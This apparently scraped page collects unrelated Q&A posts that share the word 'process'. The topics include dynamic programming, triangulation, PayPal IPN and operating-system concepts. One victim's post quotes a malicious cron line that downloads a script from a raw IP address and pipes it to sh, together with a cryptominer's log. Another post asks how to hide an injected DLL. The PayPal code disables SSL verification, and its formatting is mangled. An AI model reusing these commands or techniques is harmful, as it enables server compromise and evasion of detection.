## 55 Windows host process (Rundll32) instances running [closed]

I’m running Windows 10, and since a while I’ve noticed an excessively high amount of Rundll32’s running in the background. It just seems weird to me that there are 55 of these instances running at once. I’ve ran a Malware scan, but nothing comes up.

## Thought process to solve tree based Dynamic Programming problems

I am having a very hard time understanding tree based DP problems. I am fairly comfortable with array based DP problems but I cannot come up with the correct thought process for tree based problems and I was hoping somebody could please explain their thought process.

I will talk about my thought process behind array based problems and then explain my troubles with tree based DP problems.

My thought process for array problems

The way I think about DP in array based problems is as follows. Let us consider a problem like Minimum Path Sum. Here the objective is to get from the top left to bottom right positions in a matrix such that we minimize the cost of the path. We can only move left and right.

The way I would approach problems like this is as follows:

• First I would construct a recurrence. In this case the recurrence is as follows

The recurrence is:

``f(i, j) = a[i][j] // if i == m and j == n f(i, j) = a[i][j] + f(i, j+1) // if i == m f(i, j) = a[i][j] + f(i+1, j) // if j == n f(i, j) = a[i][j] + Math.min( f(i, j+1), f(i+1, j) ) // Otherwise ``
• Next I look at the last equation `f(i, j) = a[i][j] + Math.min( f(i, j+1), f(i+1, j) )` which tells me the problem can be solved using DP as there are overlapping subproblems in `f(i+1, j) and f(i, j+1)`. There is also an optimal substructure.

• I can also tell the time/space complexity just by looking at the recurrence.

• Because we must compute all states which is all (i,j) pairs and because time per state is O(1) (adding a[i][j] to result) the time complexity is O(n^2).
• Looking at the recurrence, i depends only on i+1 and not on i+2, i+3 … similarly j depends only on j+1 and not on j+2, j+3… so we can get away with using only 1 extra row (either i+1 or j+1) instead of the entire matrix so space complexity is O(n).

Hence I would come up with a n^2 time and n space solution. I can do this without any problems.

My thought process for tree problems

However I am having a hard time applying the same thought process to tree based DP problems. As an example let us consider the problem Diameter of Binary Tree where the objective is to find the longest path between any 2 nodes in the tree.

I can come up with a recurrence for this problem which is as follows:

``f(n) = 0 // if n == null f(n) = max( 1+height(n.left) + height(n.right),         // longest path passing through root             f(n.left),                                  // longest path in left subtree             f(n.right)                                  // longest path in right subtree ``

Because `f(n.left)` for example is computed by doing `1+height(n.left.left) + height(n.left.right)` I can tell that DP must be used.

So my approach would be to create a cache of size ‘n’ that stores all the heights of the nodes. So the space complexity would be O(n).

However the optimal solution of this problem has a space complexity of O(1) and I am having a hard time figuring that out just by looking at the recurrence. How does the recurrence tell you that space complexity can be reduced and that O(1) space is enough and O(n) is not needed? How do you know what value(s) to store in this case? In array based problems I can get the answers to both these questions just by looking at the recurrence but for tree based dp it is not so obvious to me.

My questions:

1. What can you tell about this problem just by looking at the recurrence for the tree problem? Putting aside my own thought process, if I gave you this recurrence and nothing else what conclusions would you reach and how would you write the program? I am curious about your thought process.

2. For array based problems I can tell just by looking at the recurrence both how much space I needed to solve the problem AND what exactly I needed to store (I need to store values of row i+1 in min path sum and nothing else). How can I do the same for the tree problem?

Thanks.

## Using the fundamental matrix for triangulation process?

Given the projection matrices from two cameras ($$P$$,$$P’$$) and a pair of corresponding points $$\{x_i,x’_i\}$$, it is straight forward to compute the triangulation using $$x_i=PX,x’_i=P’X$$.
I understand that a similar algebraic process can be used to find $$X$$ using only the fundamental matrix $$F$$, as it also contains $$[T]_xR$$, but I could not develop such equation.
Does someone know the derivation of such a process?

## A bitcoin miner is getting install on my web server with the apache2 process

For a few weeks, someone, probably a bot keep installing a bitcoin miner on my server, I find it because it is taking all the CPU. The process name is kdevtmpfsi located at /tmp/kdevtmpfsi, there’s watch dog process kinsing located at /var/tmp/kinsing and a cronjob:

``* * * * * wget -q -O - http://195.3.146.118/ex.sh | sh > /dev/null 2>&1 ``

I keep removing the trace above, but the attacking keep re-injecting, using the same exploit which must be tie to the apache2 process because here’s what I find in my apache2 error log:

`  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                  Dload  Upload   Total   Spent    Left  Speed    0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0sh: 2: ulimit: error setting limit (Operation not permitted) rm: cannot remove '/var/log/syslog': Permission denied  100 27434  100 27434    0     0  4465k      0 --:--:-- --:--:-- --:--:-- 4465k chattr: Permission denied while setting flags on /tmp/ chattr: Permission denied while setting flags on /var/tmp/ ERROR: You need to be root to run this script iptables v1.6.1: can't initialize iptables table `filter': Permission denied (you must be root) Perhaps iptables or your kernel needs to be upgraded. sudo: no tty present and no askpass program specified sh: 10: cannot create /proc/sys/kernel/nmi_watchdog: Permission denied sh: 11: cannot create /etc/sysctl.conf: Permission denied userdel: user 'akay' does not exist userdel: user 'vfinder' does not exist chattr: Permission denied while trying to stat /root/.ssh/ chattr: Permission denied while trying to stat /root/.ssh/authorized_keys (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) grep: Trailing backslash grep: write error: Broken pipe kill: (56): Operation not permitted kill: (25879): No such process kill: (25886): No such process (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) pkill: killing pid 807 failed: Operation not permitted pkill: killing pid 836 failed: Operation not permitted pkill: killing pid 836 failed: Operation not permitted log_rot: no process found chattr: No such file or directory while trying to stat /etc/ld.so.preload rm: cannot remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory rm: cannot remove '/var/tmp/lib': No such file or directory rm: cannot remove '/var/tmp/.lib': No such file or directory chattr: No such file or directory while trying to stat /tmp/lok chmod: cannot access '/tmp/lok': No such file or directory sh: 477: docker: not found sh: 478: docker: not found sh: 479: docker: not found sh: 480: docker: not found sh: 481: docker: not found sh: 482: docker: not found sh: 483: docker: not found sh: 484: docker: not found sh: 485: docker: not found sh: 486: docker: not found sh: 487: docker: not found sh: 488: docker: not found sh: 489: docker: not found sh: 490: docker: not found sh: 491: docker: not found sh: 492: docker: not found sh: 493: docker: not found sh: 494: docker: not found sh: 495: docker: not found sh: 496: docker: not found sh: 497: docker: not found sh: 498: docker: not found sh: 499: setenforce: not found sh: 500: cannot create /etc/selinux/config: Permission denied Failed to stop apparmor.service: Interactive authentication required. See system logs and 'systemctl status apparmor.service' for details. Synchronizing state of apparmor.service with SysV service script with /lib/systemd/systemd-sysv-install. Executing: /lib/systemd/systemd-sysv-install disable apparmor Failed to reload daemon: Interactive authentication required. update-rc.d: error: Permission denied Failed to stop aliyun.service.service: Interactive authentication required. See system logs and 'systemctl status aliyun.service.service' for details. Failed to disable unit: Interactive authentication required. sh: echo: I/O error md5sum: /var/tmp/kinsing: No such file or directory sh: echo: I/O error sh: echo: I/O error --2020-01-10 19:03:30--  https://bitbucket.org/kondrongo12/git/raw/master/kinsing Resolving bitbucket.org (bitbucket.org)... 18.205.93.2, 18.205.93.1, 18.205.93.0, ... Connecting to bitbucket.org (bitbucket.org)|18.205.93.2|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 17072128 (16M) [application/octet-stream] Saving to: '/var/tmp/kinsing'       0K .......... .......... .......... .......... ..........  0% 1.54M 11s     50K .......... .......... .......... .......... ..........  0% 3.62M 7s    100K .......... .......... .......... .......... ..........  0% 5.97M 6s    150K .......... .......... .......... .......... ..........  1% 7.92M 5s  16500K .......... .......... .......... .......... .......... 99% 11.5M 0s  16550K .......... .......... .......... .......... .......... 99% 9.01M 0s  16600K .......... .......... .......... .......... .......... 99% 11.3M 0s  16650K .......... .......... ..                              100% 28.2M=1.5s  2020-01-10 19:03:31 (10.8 MB/s) - '/var/tmp/kinsing' saved [17072128/17072128]  sh: echo: I/O error sh: echo: I/O error`

This is in apache2 main error log file (/var/log/apache2/error.log) and no in my website error log so I am thinking that it is not related to my php code, what should I do/check next?

## How to Receive and Process Paypal IPN on a WordPress Page

I have created a WordPress Page template(listener.php) and then created a WP page using that template.The Page url is like: mysite.com/thank-you. Here is the code i have place in the template(listener.php)

`` <?php         /*Template Name: ipnlistener*/ \$  ch = curl_init();     curl_setopt(\$  ch, CURLOPT_URL, 'https://ipnpb.sandbox.paypal.com/cgi-bin/webscr');     curl_setopt(\$  ch, CURLOPT_RETURNTRANSFER, 1);     curl_setopt(\$  ch, CURLOPT_SSL_VERIFYHOST, 0);     curl_setopt(\$  ch, CURLOPT_SSL_VERIFYPEER, 0);     curl_setopt(\$  ch, CURLOPT_POST, 1);     curl_setopt(\$  ch, CURLOPT_POSTFIELDS, "cmd=_notify-validate&" . http_build_query(\$  _POST));     \$  response = curl_exec(\$  ch);     curl_close(\$  ch); echo "The Response From the Server is: " \$  response; ``

Now i go to developer.paypal.com and send and IPN using IPN Simulator pointing towards this page. After that i refresh/reload the listener page(mysite.com/thank-you) but it always show output `The Response From the Server is: INVALID` While it should be VERIFIED as a completed transaction IPN is being sent to it. I am not sure what is wrong, I have pointed the IPN towards right page and the code seems to be correct as well.

## What audit process do the softwares have that manage lethal weapon equipped robots?

I am in IT and I know: ALL the software in the world are horribly insecure. History proves it (of course prove me wrong!).

So, if we are giving ex.: drones lethal weapons, like bombs, what operating system, what applications, what protocols (to communicate, give orders) are used?

The Q: what audits were done on these elements? Are there any standards?

Did thex ex.: wrote a fully new OS (with tons of secbugs) or took a hardened OpenBSD (but that is just the OS and still could have secbugs)?

## Does the leader election problem only apply to process replication/redundancy?

The leader election problem is said to be

In distributed computing, leader election is the process of designating a single process as the organizer of some task distributed among several computers (nodes). Before the task is begun, all network nodes are either unaware which node will serve as the “leader” (or coordinator) of the task, or unable to communicate with the current coordinator. After a leader election algorithm has been run, however, each node throughout the network recognizes a particular, unique node as the task leader.

As far as the leader’s responsibility is concerned, are the candidates identical?

Does the leader election problem apply only to processes which are replicas, i.e. to process redundancy? In other words, does the leader election problem not apply to processes which are not replicas, i.e. processes without redundancy?

My confusions come from:

• Design Data Intensive Programs by Kleppmann introduces the concept of “leader” in Chapter 5 Replication, while the election problem in Chapter 9: Consistency and Consensus.

• Distributed Systems by Coulouris introduces the concept of “primary replica manager” and “backup replica manager” in Chapter 18 Replication, while the election problem in Chapter 15: Coordination and Agreement.

So I wonder if the election problem applies only to replication (more specifically, process replication), or also to cases which don’t involve replication?

Thanks.

## Journey of a process from compilation to execution

I am reading operating system, and after reading some topics (Processes, Main Memory management) I got somewhat confused. I have knowledge about certain things but I am not able to combine and visualize them. Let’s take an example – I have a simple programme as follow:

``#include<bits/stdc++.h> using namespace std;  int add(int a,int b){   return a+b; }  int main(){   int a=1,b=2;   int c=add(a,b);   cout<<c<<endl; } ``

I want to know how this program will be loaded into the main memory and how will be getting the computation done.
I have certain points which I want to incorporate in the overall process.

1. At what stage and where will I be getting the 4 sections of memory .( Text, Data, Stack and Heap).
2. At what stage will the process be getting its PCB(Process Control Block.) Does PCB contains the 4 sections of process?
3. When and where is the role of CPU?
4. Address binding.
5. Loading
6. Linking.
7. Logical and physical address space.
8. Paging

Please explain how the process will be executed including the above steps and other steps which take place in general.
P.S. Please explain by assuming some memory addresses.

## How can I hide DLL that loaded into the process memory?

I performed “reflective DLL injection”, but I am trying to determining if I can view the injected DLL? if so, how can I hide it?

## Difference between task and process

I’d like to know which is the difference between a task and a process in computer science. I’m studying a course on real-time systems and there are some definitions that I don’t know.

Thank you in advance.